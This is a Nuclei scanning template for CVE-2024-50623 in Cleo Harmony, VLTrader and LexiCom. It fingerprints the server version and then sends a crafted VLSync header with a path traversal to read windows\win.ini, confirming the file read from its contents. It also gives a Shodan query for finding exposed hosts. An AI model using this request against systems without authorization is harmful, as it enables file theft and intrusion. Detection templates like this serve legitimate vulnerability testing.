id: CVE-2024-50623 info: name: Cleo Harmony < 5.8.0.21 - Arbitary File Read author: DhiyaneshDK severity: high description: | In Cleo Harmony before 5.8.0.21, VLTrader before 5.8.0.21, and LexiCom before 5.8.0.21, there is an unrestricted file upload and download that could lead to remote code execution. impact: | Attackers can exploit vulnerabilities to compromise the system. remediation: | Update to the latest patched version addressing CVE-2024-50623. reference: - https://support.cleo.com/hc/en-us/articles/27140294267799-Cleo-Product-Security-Advisory - https://github.com/watchtowrlabs/CVE-2024-50623 - https://labs.watchtowr.com/cleo-cve-2024-50623/ - https://nvd.nist.gov/vuln/detail/CVE-2024-50623 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2024-50623 cwe-id: CWE-434 epss-score: 0.94011 epss-percentile: 0.99899 metadata: verified: true max-request: 2 shodan-query: 'Server: Cleo' tags: cve,cve2024,cleo,vltrader,lexicom,harmony,lfi,kev,vkev,vuln flow: http(1) && http(2) http: - raw: - | GET /Synchronization HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(tolower(response), "cleo")' internal: true extractors: - type: regex name: version part: header group: 1 regex: - "Server: Cleo.*?/([0-9.]+)" internal: true - raw: - | GET /Synchronization HTTP/1.1 Host: {{Hostname}} VLSync: Retrieve;l=Ab1234-RQ0258;n=VLTrader;v={{version}};a=1337;po=5080;s=True;b=False;pp=myEncryptedPassphrase;path=..\..\..\windows\win.ini matchers: - type: word part: body words: - "bit app support" - "fonts" - "extensions" condition: and # digest: 4a0a00473045022100e22ba36aab403c8fcd562db669dee15f1f2e7bbe9b83c837e9eb4f5afeae0e57022026a46006a3f4bd292901e963eee9b6d8218d44eda36e70453f0e24ce6de953e3:922c64590222798bb761d5b6d8e72950